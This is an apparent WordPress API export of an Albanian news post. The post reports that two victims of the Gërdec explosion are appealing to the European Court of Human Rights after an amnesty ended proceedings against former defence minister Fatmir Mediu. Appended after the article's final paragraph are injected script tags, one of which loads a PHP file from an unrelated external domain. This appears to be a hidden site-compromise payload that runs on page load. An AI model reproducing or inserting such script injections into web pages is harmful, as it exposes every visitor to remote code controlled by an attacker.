{"id":161,"date":"2013-03-10T08:22:03","date_gmt":"2013-03-10T08:22:03","guid":{"rendered":"http:\/\/localhost\/test\/?p=49"},"modified":"2014-10-07T10:42:11","modified_gmt":"2014-10-07T08:42:11","slug":"durdaj-dhe-hazizaj-mesa-duket-do-degjoni-perseri-per-ta","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=161","title":{"rendered":"Durdaj dhe Hazizaj, mesa duket do d\u00ebgjoni p\u00ebrs\u00ebri p\u00ebr ta"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2013\/03\/visha-mediu1.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft wp-image-711 size-medium\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2013\/03\/visha-mediu1-300x224.jpg\" alt=\"visha-mediu1\" width=\"300\" height=\"224\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2013\/03\/visha-mediu1-300x224.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2013\/03\/visha-mediu1.jpg 448w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>T\u00eb plagosurit r\u00ebnd\u00eb nga shp\u00ebrthimi i G\u00ebrdecit i drejtohen p\u00ebrs\u00ebri Gjykat\u00ebs t\u00eb s\u00eb Drejtave t\u00eb Njeriut n\u00eb Strasburg. Sipas tyre p\u00ebrfshirja n\u00eb amnisti e ish ministrit t\u00eb mbrojtjes z Famir Mediu, ka cuar n\u00eb shkelje t\u00eb qarta t\u00eb nj\u00eb numri t\u00eb t\u00eb drejtave t\u00eb garantuara nga Konventa Europiane p\u00ebr Mbrojtjen e t\u00eb Drejtave t\u00eb Njeriut dhe Lirive Themelore (\u201cKonventa\u201d) \u2013 n\u00eb ve\u00e7anti t\u00eb neneve 2, 8, dhe 13 lidhur me nenet 2 dhe 8. Aplikant\u00ebt Durdaj dhe Hazizaj i referuan historikun e gjykimit t\u00eb tyre q\u00eb pati filles\u00eb n\u00eb nj\u00eb procedim penal ndaj Fatmir Mediut ne cilesine e Ministrit te Mbrojtjes m\u00eb 18.11.2009 dy muaj pas pushimit t\u00eb c\u00ebshtjes ndaj tij m\u00eb dt 14 shtator 2009.<\/p>\n<p>Historiku i gjat\u00eb i p\u00ebrpjekjeve fillon pik\u00ebrisht me Gjykat\u00ebn e Lart\u00eb, e cila n\u00eb at\u00eb koh\u00eb, pas aplikimit t\u00eb Durdaj dhe Hazizaj e mori n\u00eb shqyrtim k\u00ebt\u00eb c\u00ebshtje dhe, pasi d\u00ebshtuan p\u00ebrpjekjet p\u00ebr pajtim t\u00eb detyrueshme p\u00ebr tu kryer sipas nenit 338 t\u00eb Kodit t\u00eb Procedur\u00ebs Penale, m\u00eb 01.03.2010 vendosi t\u00eb pushoj\u00eb gjykimin. Arsyet e pushimit ishin q\u00eb nuk gjendeshin arsye apo prova t\u00eb mjaftueshme p\u00ebr t\u00eb nisur procedimin penal ndaj t\u00eb akuzuarit Fatmir Mediu.<\/p>\n<p>N\u00eb k\u00ebto kushte Durdaj dhe Hazizaj iu drejtuan Gjykat\u00ebs Kushtetuese duke pretenduar se ishte shkelur e drejta p\u00ebr nj\u00eb proces t\u00eb rregullt ligjor, bazuar n\u00eb nenin 42 t\u00eb Kushtetut\u00ebs dhe nenin 6 t\u00eb Konvent\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut.<\/p>\n<p>Gjykata Kushtetuese, me vendimin nr. 27 dt. 09.05.2012 vendosi t\u00eb rikthej\u00eb c\u00ebshtjen n\u00eb Gjykat\u00ebn e Lart\u00eb , duke e konsideruar praktik\u00ebn e ndjekur n\u00eb shkelje t\u00eb procesit t\u00eb rregullt ligjor. Gjykata Kushtetuese arsyetoi q\u00eb Gjykata e Lart\u00eb duhej t\u00eb k\u00ebrkonte s\u00eb pari t\u00eb hiqte imunitetin e t\u00eb pandehurit, t\u00eb niste hetimin gjyq\u00ebsor dhe m\u00eb pas t\u00eb shprehej p\u00ebr faj\u00ebsin\u00eb ose jo t\u00eb t\u00eb pandehurit vet\u00ebm pas nj\u00eb hetimi t\u00eb plot\u00eb e t\u00eb gjithansh\u00ebm.<\/p>\n<p>Gjykata e Lart\u00eb e nisi me vones\u00eb rifillimin e gjykimit, pasi pati v\u00ebshtir\u00ebsi n\u00eb formimin e trupit gjykues, pas dor\u00ebheqjes s\u00eb disa gjyqtar\u00ebve q\u00eb u binte shorti. M\u00eb n\u00eb fund, n\u00eb shtator 2012 Gjykata e Lart\u00eb formoi trupin gjykues me 5 gjyqtar\u00eb t\u00eb tjer\u00eb.<\/p>\n<p>M\u00eb 07.11.2012 Kuvendi miratoi nj\u00eb amnisti t\u00eb p\u00ebrgjithshme me rastin festiv t\u00eb 100 vjetorit t\u00eb pavar\u00ebsis\u00eb s\u00eb Shqip\u00ebris\u00eb. Drafti ishte i paqart\u00eb p\u00ebr publikun se cilat vepra penale prekte dhe cilat p\u00ebrjashtonte, ndaj Gjykata e Lart\u00eb vijoi me gjykimin e c\u00ebshtjes n\u00eb disa seanca n\u00eb n\u00ebntor 2012. M\u00eb 28.12.2012 amnistia u publikua dhe hyri n\u00eb fuqi.<\/p>\n<p>Gjykata e Lart\u00eb m\u00eb 10.12.2012 vendosi pushimin e c\u00ebshtjes p\u00ebr shkak t\u00eb amnistis\u00eb, duke nd\u00ebrprer\u00eb p\u00ebrfundimisht cdo procedur\u00eb q\u00eb ishte n\u00eb kryerje e sip\u00ebr, sic ishte nxjerrja e nj\u00eb ekstrakti t\u00eb provave shkresore nga dosja gjyq\u00ebsore e Vendimit nr. 6 dt. 14.09.2009 p\u00ebr t\u00eb nj\u00ebjtin t\u00eb pandehur, thirrja e d\u00ebshmitar\u00ebve dhe ekspert\u00ebve.<\/p>\n<p>Pas pushimit t\u00eb c\u00ebshtjes bazuar n\u00eb amnistin\u00eb e hyr\u00eb n\u00eb fuqi m\u00eb 28.12.2012, aplikant\u00ebt nuk pat\u00ebn asnj\u00eb mjet efektiv tjet\u00ebr p\u00ebr t\u00eb realizuar t\u00eb drejt\u00ebn e tyre.<\/p>\n<p>N\u00eb k\u00ebto kushte mund\u00ebsia e vetme p\u00ebr t\u00eb siguruar mbrojtje p\u00ebr Durdaj dhe Hazizaj mbetet ankimi n\u00eb Gjykat\u00ebn Europiane p\u00ebr t\u00eb Drejtat e Njeriut, t\u00eb cil\u00ebs ata ju drejtuan dhe nj\u00eb her\u00eb.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>T\u00eb plagosurit r\u00ebnd\u00eb nga shp\u00ebrthimi i G\u00ebrdecit i drejtohen p\u00ebrs\u00ebri Gjykat\u00ebs t\u00eb s\u00eb Drejtave t\u00eb Njeriut n\u00eb Strasburg. Sipas tyre [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":711,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/161"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=161"}],"version-history":[{"count":7,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/161\/revisions"}],"predecessor-version":[{"id":712,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/161\/revisions\/712"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/711"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=161"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=161"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=161"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}